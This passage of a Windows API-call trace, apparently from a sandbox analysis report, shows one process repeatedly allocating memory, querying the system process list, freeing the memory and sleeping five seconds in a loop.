RegionSize=0xdea54*=0x20000) returned 0x0 [0224.148] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.153] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.154] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.155] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.156] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.157] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.157] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.157] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.161] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.162] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.164] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.164] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.165] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.165] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.165] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.170] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.170] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.172] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.172] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.174] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.174] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.174] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.179] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.180] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.181] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.182] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.183] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.183] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.183] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.189] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.189] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.191] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.192] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.193] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.193] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.193] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.198] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.199] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.201] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.201] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.202] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.202] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.202] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.206] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.207] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.209] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.209] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.209] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.210] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.210] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.213] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.214] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.216] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.216] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.217] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.217] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.217] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.220] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.221] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.223] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.223] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.223] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.223] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.224] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.227] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.228] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.229] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.230] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.230] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.230] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.231] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.234] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.235] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.237] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.237] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.237] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.238] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.238] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.241] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.242] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.243] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.243] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.244] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.244] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.244] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.248] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.248] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.250] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.250] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.250] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.250] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.251] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.254] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.255] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.257] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.257] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.257] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.258] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.258] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.261] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.262] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.263] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.263] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.264] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.264] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.264] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.268] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.268] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.270] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.270] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.271] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.271] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.271] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.279] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.280] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.281] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.282] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.282] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.282] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.283] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.286] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.287] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.288] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.289] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.289] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.289] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.290] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.293] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.294] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.295] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.295] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.296] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.296] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.296] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.299] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.300] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.301] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.301] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.302] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.302] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.302] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.306] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.306] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.308] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.308] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.308] 